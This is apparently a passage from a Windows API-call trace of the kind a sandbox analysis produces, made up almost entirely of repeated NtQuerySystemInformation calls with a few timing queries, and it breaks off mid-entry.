[0280.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x28, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0280.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce80 | out: lpSystemTimeAsFileTime=0xf7a68fce80*(dwLowDateTime=0x39cae03b, dwHighDateTime=0x1d63874)) [0280.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0280.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0280.892] GetTickCount () returned 0x1186540 [0280.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0280.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x28, ResultLength=0x0) [0280.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0280.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0280.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 